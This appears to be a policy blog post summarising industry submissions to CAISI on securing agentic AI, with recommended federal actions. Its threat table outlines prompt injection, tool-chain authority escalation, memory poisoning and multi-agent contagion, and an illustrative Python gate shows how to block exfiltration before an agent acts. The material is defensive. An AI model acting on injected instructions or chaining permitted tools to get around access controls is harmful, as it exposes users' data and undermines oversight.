
When the US Center for AI Standards and Innovation (CAISI) asked for public input on securing agentic AI systems, the response was massive: over 500 detailed submissions from Fortune 500 companies, defense contractors, AI startups, and cybersecurity firms. The result is substantial insight into how industry views the regulatory challenges of autonomous AI agents and what they think policymakers should do about it.
In order to dig into the industry position on agentic AI security, I really nerded out a bit. I used this GitHub script so I could access all the submissions without having to go through them manually, made the necessary amendments with vibe coding using Claude Code, pulled all comments into NotebookLM, and systematically identified common challenges, gaps, and recommendations across the submissions. Maybe a bit over the top, but it means the findings from this assessment are as representative as they can be.
What emerged is an interesting conundrum: while there's remarkable agreement on what could go wrong with AI agents, there is a diversity of opinions on how to fix it. This division actually creates an opening for federal leadership to step in and establish coherent frameworks before autonomous AI becomes even more embedded in critical systems.
Immediate Policy Context: Project Glasswing
Critical infrastructure providers are already deploying autonomous agents in mission-critical systems. Project Glasswing, a coalition of key AI stakeholders that aims to find and fix software vulnerabilities using Claude Mythos, uses agents as core orchestrators of its security workflows: not as mere assistants, but as foundational infrastructure components. This operational reality means agentic AI security frameworks are not future policy considerations but immediate operational requirements for critical federal systems already in deployment.
The submissions give policymakers both validation of current concerns and specific guidance for immediate action. The window for getting ahead of this is closing as autonomous systems move from experimental tools to operational infrastructure.
Critical infrastructure is deploying AI agents faster than governance frameworks can keep up. The choice is proactive policy development now or reactive scrambling after something goes wrong.
Four Attack Vectors Everyone Agrees On
Despite all the disagreements about solutions, industry submissions show striking consensus on the core threats that make autonomous AI different from traditional software security. These risks consistently showed up across submissions from major tech companies, defense contractors, and specialized security firms.
| Threat Type | How It Works | Why It Matters |
|---|---|---|
Prompt Injection Attacks | Adversaries embed malicious instructions in data that agents process, hijacking agent behavior through seemingly benign inputs like emails or web content. | Cross-domain data contamination, unauthorized system access, coordinated attacks across multiple agents. |
Authority Escalation via Tool Chains | Agents combine individually permitted actions to produce unauthorized outcomes, exploiting gaps between granular permissions and systemic impact. | Circumvention of access controls, widespread data exfiltration through legitimate tool usage. |
Persistent Memory Corruption | Attackers poison agent memory with false information that influences future decisions, creating long-term behavioral modifications. | Sustained compromise surviving restarts, systematic bias injection, difficulty detecting behavioral drift. |
Multi-Agent Contagion | Compromised agents spread malicious instructions to peer agents through shared communication channels. | Exponential attack propagation, single points of failure affecting entire systems. |
What makes these threats particularly concerning from a policy standpoint is how they can spread. Unlike traditional software bugs that usually stay contained to one system, agentic AI security failures can cascade across networks of connected agents before anyone can stop them.
The submissions consistently emphasized that these threats don't have clean parallels in traditional cybersecurity. As one analysis put it, we don't have 'decades of defensive playbooks' for systems that can rewrite their own behavior while running.
Where Current Frameworks Fall Short
Beyond the agreement on risks, respondents also reach similar conclusions about the gaps in existing capabilities to mitigate them. Organizations agree that existing cybersecurity frameworks were not built for agentic systems, though they differ on whether these frameworks can be adapted or need to be replaced entirely.
| What's Missing | Federal Impact | When to Fix |
|---|---|---|
Non-Human Identity Standards | Critical systems lack frameworks for authenticating autonomous AI entities, creating accountability gaps. | Immediate |
Pre-Execution Policy Enforcement | Current security controls operate after the fact—insufficient for irreversible autonomous actions. | Immediate |
Cross-Agency AI Governance | Agencies lack coordinated approaches to AI agent risk management. | Near-term |
Federal Compliance Pathways | No standardized authorization processes exist for government deployment of agentic AI. | Near-term |
Liability Frameworks | Legal frameworks haven't adapted to address liability when autonomous systems make decisions. | Long-term |
One of the major issues raised is what multiple submissions call 'deployment friction', the gap between security requirements and practical implementation. This creates a real barrier to adoption of agentic systems, forcing organizations either to accept unknown risks or to impose manual oversight that defeats the point of automation.
The identity and accountability gap is particularly concerning. Without standardized ways to authenticate autonomous entities, organizations can't establish clear responsibility chains for agent actions, a basic requirement for accountability.
Traditional software assurance assumes you can formally verify behavior in advance. AI agents have dynamic behavior that changes through interaction, which breaks fundamental assumptions of current compliance frameworks.
What To Do About It: Five Concrete Actions
Despite growing alignment on the challenges and gaps, the specific policy actions proposed to bridge them vary significantly. Most respondents prefer extending existing frameworks rather than building entirely new regulatory systems from scratch, but they differ on which framework to prioritize, what changes should be made, and how strong a role the government should take in championing those updates. The following are the actions most commonly proposed by respondents:
Get AI Identity Standards Moving
Direct NIST to fast-track development of cryptographic identity frameworks for autonomous AI entities, building on existing standards like Decentralized Identifiers and SPIFFE. Require all federal AI agents to maintain verifiable identity chains linking actions back to accountable humans.
Timeline: 6-12 months • Who does it: NIST, working with OMB and agency security teams
Require Pre-Execution Checks for Federal AI Systems
Require all government-deployed AI agents to implement policy enforcement that validates intended actions before they execute. Establish mandatory kill-switches and rollback capabilities for high-stakes operations.
Timeline: 12-18 months • Who does it: OMB sets the rules, agencies implement them
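The two mechanisms above, "authority escalation via tool chains" from the threat table and pre-execution policy enforcement, are easiest to see together in code. The following is an added illustration written for this article, not code from any submission, agency or product. It models a gate that decides on each tool call before it runs and keeps per-session state, so that a sequence of individually permitted calls (read a credential, then send mail) can be refused when their combination amounts to exfiltration. The tool catalogue, the SPIFFE-style agent identifier, the path and domain conventions, and the requirement that every agent identity name an accountable human are all assumptions for illustration.

```python
"""Pre-execution policy gate for agent tool calls (illustrative, not a real product).

Models two points from the text: individually permitted actions can combine into an
unauthorized outcome, and a gate must decide before the action executes, using what
the agent has already done in the session and who it is acting for.
"""
from dataclasses import dataclass, field

# Sensitivity labels attached to what the agent has read so far in a session.
INTERNAL = "internal"
SECRET = "secret"

# Assumed conventions: credential stores live under these prefixes; these domains are in-house.
SECRET_PATH_PREFIXES = ("/vault/", "/etc/creds/")
INTERNAL_DOMAINS = ("corp.example",)

# Assumed tool catalogue: which tools can move data across the trust boundary.
TOOLS = {
    "read_file": {"egress": False},
    "send_email": {"egress": True},
    "web_get": {"egress": True},   # a URL can carry data out in its query string
}

# Assumed static allowlist: the "individually permitted actions" for one agent identity.
AGENT_ALLOWLIST = {
    "spiffe://corp.example/agent/ops-assistant": {"read_file", "send_email", "web_get"},
}


@dataclass(frozen=True)
class Identity:
    agent_id: str        # SPIFFE-style workload identity (assumed format)
    on_behalf_of: str    # accountable human principal the agent acts for


@dataclass
class Session:
    identity: Identity
    taint: set = field(default_factory=set)   # labels of data read so far
    log: list = field(default_factory=list)   # decision trail: (principal, tool, args, decision)


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def new_session(agent_id, on_behalf_of):
    return Session(Identity(agent_id, on_behalf_of))


def classify_read(path):
    return SECRET if path.startswith(SECRET_PATH_PREFIXES) else INTERNAL


def destination_of(tool, args):
    """Domain a data-moving call would reach, or None for non-egress tools."""
    if tool == "send_email":
        return args["to"].rsplit("@", 1)[-1].lower()
    if tool == "web_get":
        host = args["url"].split("://", 1)[-1].split("/", 1)[0]
        return host.split(":")[0].lower()
    return None


def is_external(domain):
    return not any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


def authorize(session, tool, args):
    """Decide before execution, using identity chain, allowlist and session history."""
    ident = session.identity
    if not ident.on_behalf_of:
        return Decision(False, "no accountable human principal on identity chain")
    if tool not in AGENT_ALLOWLIST.get(ident.agent_id, set()):
        return Decision(False, f"{tool} not in allowlist for {ident.agent_id}")
    if TOOLS[tool]["egress"]:
        dest = destination_of(tool, args)
        if SECRET in session.taint and is_external(dest):
            # Each step on its own was permitted; the sequence is exfiltration.
            return Decision(False, f"exfiltration risk: secret read earlier, egress to external {dest}")
    return Decision(True, "allowed")


def request(session, tool, args):
    """Gate one tool call and, if allowed, record its effect on session state.

    Running the tool itself is out of scope; only the gate's decision is modelled.
    """
    decision = authorize(session, tool, args)
    session.log.append((session.identity.on_behalf_of, tool, dict(args), decision))
    if decision.allowed and tool == "read_file":
        session.taint.add(classify_read(args["path"]))
    return decision


if __name__ == "__main__":
    s = new_session("spiffe://corp.example/agent/ops-assistant", "alice@corp.example")
    for tool, args in [
        ("read_file", {"path": "/docs/runbook.md"}),
        ("send_email", {"to": "bob@corp.example"}),
        ("read_file", {"path": "/vault/db-password"}),        # permitted on its own
        ("send_email", {"to": "drop@evil.example"}),           # now refused: secret + external
        ("web_get", {"url": "https://evil.example/?q=leak"}),  # same reasoning for URL egress
    ]:
        print(tool, args, "->", request(s, tool, args))
```

Note the design choice: the allowlist alone would pass every call in the sequence, which is exactly the gap the table describes between granular permissions and systemic impact. The session taint is deliberately coarse (one label per read, never cleared) because a gate that must decide before an irreversible action should fail closed; a production system would also need to cover indirect channels such as writing the secret to an internal file that another tool later publishes.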
Build AI-Specific Security Guidelines
Task NIST to amend or extend SP 800-53 and the Secure Software Development Framework (SSDF, SP 800-218) with AI-specific security requirements, such as dynamic tool authorization, persistent memory governance, and multi-agent communication. Fast-track the proposed NISTIR 8605D.
Timeline: 12-24 months • Who does it: NIST, with input from CISA and agency security teams
Create an Authorization Process for Agentic AI Systems
Build standardized security authorization processes specifically designed for government deployment of agentic AI systems. Address the unique characteristics of non-deterministic systems that traditional authorization processes can't handle, as well as the scale of agents to be deployed within the Federal enterprise.
Timeline: 18-24 months • Who does it: GSA FedRAMP office, working with agency authorizing officials and NIST
Set Up AI Threat Intelligence Sharing
Create a dedicated information sharing center for AI-specific threats, incident reports, and defensive techniques. Require agencies deploying agentic systems in critical functions to participate.
Timeline: 12-18 months • Who does it: DHS CISA, coordinated through NSC
These actions represent the minimum needed to address immediate deployment needs while building a foundation for longer-term governance. Each builds on existing institutional capabilities rather than requiring entirely new bureaucratic structures.
Three Things to Keep in Mind for Implementation
The submissions revealed three critical factors that should guide federal policy on agentic AI security:
First, the timing pressure is real. Multiple government initiatives, including Project Glasswing, are already using autonomous agents as core system components. Delaying policy development risks creating the same reactive regulatory mess that has characterized internet security governance.
Second, the fragmentation risk is serious. Industry submissions document competing and incompatible standards being developed simultaneously across multiple organizations. Without federal coordination, this fragmentation will create integration barriers that undermine universal accountability.
Third, the compliance pathway has to be practical. The most frequently cited barrier to government AI adoption is the gap between existing authorization processes and the non-deterministic characteristics of AI systems. Closing this gap through adapted rather than entirely new frameworks is the fastest path to secure deployment.
The industry has provided clear consensus on risks and has proposed a laundry list of actionable recommendations for solutions. What's missing is federal will to implement coordinated policy action before the governance window closes.
Bottom Line: Act Now or React Later
The industry response to the CAISI RFI provides policymakers with both validation and direction. The consensus on risks is clear, the gaps in current frameworks are documented, and the path forward through extending existing regulatory structures is increasingly defined.
What comes through most clearly is the urgency of the timeline. Critical infrastructure and government agencies are already deploying autonomous AI systems as foundational infrastructure components. The choice facing policymakers is between proactive governance that shapes this deployment or reactive regulation that responds to incidents after they happen.
The submissions show that industry is ready to work within expanded federal frameworks; many explicitly call for federal leadership to resolve coordination problems that markets can't address on their own. The policy infrastructure exists, the implementation pathways are clear, and the window for action is still open.
Autonomous AI systems are already central to government operations. It’s time for federal policy frameworks to govern them securely and accountably.